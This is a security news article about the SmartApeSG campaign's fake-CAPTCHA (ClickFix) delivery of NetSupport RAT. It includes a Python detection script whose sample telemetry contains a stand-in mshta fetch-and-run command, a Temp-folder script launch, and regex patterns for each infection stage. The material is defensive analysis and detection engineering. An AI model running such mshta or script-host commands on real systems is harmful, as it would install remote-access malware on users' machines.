The evolving SmartApeSG campaign, also known as ZPHP or HANEY MANEY, is employing a sophisticated ClickFix technique to deploy the NetSupport Remote Access Trojan (RAT) on Windows systems. This shift in tactics moves away from previous methods involving fake browser updates, instead tricking users into verifying their humanity through deceptive CAPTCHA pages to initiate malware infections.
First observed in June 2024, the SmartApeSG campaign’s primary vector involves compromised websites that host hidden malicious scripts. When specific conditions are met by a visiting user, these scripts activate, presenting a fake “verify you are human” prompt. This social engineering approach aims to bypass user vigilance and prompt actions that lead to the installation of malware.
SmartApeSG Leverages ClickFix Technique for NetSupport RAT Deployment
Security researchers have detailed how the SmartApeSG campaign uses a ClickFix-style technique, effectively exploiting user trust by masquerading as a necessary verification step. This method is particularly concerning as it relies on user interaction rather than exploiting software vulnerabilities, making it harder for traditional security solutions to block.
According to Internet Storm Center analysts, the attack chain begins when a user clicks the fake CAPTCHA box. This action triggers the injection of a malicious command string directly into the user’s clipboard. The command then utilizes the `mshta` utility to retrieve and execute malicious code hosted on attacker-controlled servers, a stealthy way to initiate the infection process.
The ultimate goal of this elaborate scheme is the installation of NetSupport RAT. This powerful remote access tool grants attackers extensive control over infected computers. With NetSupport RAT, threat actors can gain unauthorized access to sensitive data, monitor user activities in real-time, and further propagate other forms of malware onto the compromised system.
Multi-stage Approach for Enhanced Evasion
The SmartApeSG campaign’s multi-stage approach is crucial to its effectiveness. The initial infection phase, triggered by the fake CAPTCHA, lays the groundwork for the persistent presence of the NetSupport RAT on the victim’s machine. This persistence is maintained through a clever Windows mechanism.
Specifically, the campaign creates a Start Menu shortcut that points to a JavaScript file. This file is typically stored in the user’s `AppData\Local\Temp` directory. Upon execution, the JavaScript file then launches the actual NetSupport RAT executable, which is placed in the `C:\ProgramData` directory. This layered deployment makes the malware harder for the average user to detect and remove.
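The three stages described above (an `mshta` launch fetching remote content, a script host running a `.js` file from `AppData\Local\Temp`, and an executable under `C:\ProgramData` spawned by that script host) map onto process-creation telemetry. The following detection logic is an added example written for this article, not code from the Internet Storm Center or any vendor; the event fields are modelled on Sysmon Event ID 1 (ParentImage, Image, CommandLine), and the sample events, URL and file paths are constructed placeholders, not real indicators from the campaign.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

@dataclass
class ProcEvent:
    """Minimal process-creation record (fields modelled on Sysmon Event ID 1)."""
    parent: str    # ParentImage
    image: str     # Image
    cmdline: str   # CommandLine

# Constructed sample telemetry, not real data: one benign launch followed by
# the three stages the article describes (mshta fetch, Temp .js, ProgramData exe).
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe",
              r'"C:\Windows\System32\notepad.exe" notes.txt'),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
              r"mshta https://stage.example.invalid/captcha"),   # placeholder URL
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\wscript.exe",
              r'wscript.exe "C:\Users\alice\AppData\Local\Temp\launch.js"'),
    ProcEvent(r"C:\Windows\System32\wscript.exe", r"C:\ProgramData\Updater\agent.exe",
              r'"C:\ProgramData\Updater\agent.exe"'),            # placeholder path
]

_URL = re.compile(r"https?://", re.IGNORECASE)
_TEMP_JS = re.compile(r"\\AppData\\Local\\Temp\\[^\"']*\.js\b", re.IGNORECASE)
_SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def classify(ev: ProcEvent) -> Optional[str]:
    """Return the rule name an event trips, or None if it looks benign."""
    img = basename(ev.image)
    if img == "mshta.exe" and _URL.search(ev.cmdline):
        return "mshta-remote-content"          # stage 1: clipboard-pasted mshta command
    if img in _SCRIPT_HOSTS and _TEMP_JS.search(ev.cmdline):
        return "script-host-js-from-temp"      # stage 2: Start Menu shortcut -> Temp .js
    if ev.image.lower().startswith("c:\\programdata\\") and basename(ev.parent) in _SCRIPT_HOSTS:
        return "programdata-exe-from-script"   # stage 3: .js launches the RAT binary
    return None

def detect(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    """Scan events in order; return (index, rule) for every hit."""
    return [(i, classify(ev)) for i, ev in enumerate(events) if classify(ev)]

if __name__ == "__main__":
    for i, rule in detect(SAMPLE_EVENTS):
        print(f"event {i}: {rule}  <- {SAMPLE_EVENTS[i].cmdline}")
```

Each rule fires on its own, so the first one (an `mshta` launch with a URL argument) gives an alert before persistence is ever written; correlating all three within a short window on one host raises confidence considerably.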
A significant factor contributing to the danger of SmartApeSG is the constant evolution of its operational infrastructure. The threat actors behind this campaign demonstrate a high degree of agility, frequently changing their command and control (C2) domains, server infrastructure, and the malware packages themselves. This rapid rotation necessitates continuous updates to threat intelligence feeds to effectively track and defend against ongoing attacks.
Organizations and individuals alike should prioritize educating themselves and their users about the risks associated with clicking verification boxes or other interactive elements on unfamiliar or compromised websites. Implementing network-level security measures to block connections to known malicious domains associated with the SmartApeSG campaign is also a critical defensive step. The ongoing evolution of this threat suggests that continuous adaptation of security strategies will be necessary to mitigate future risks.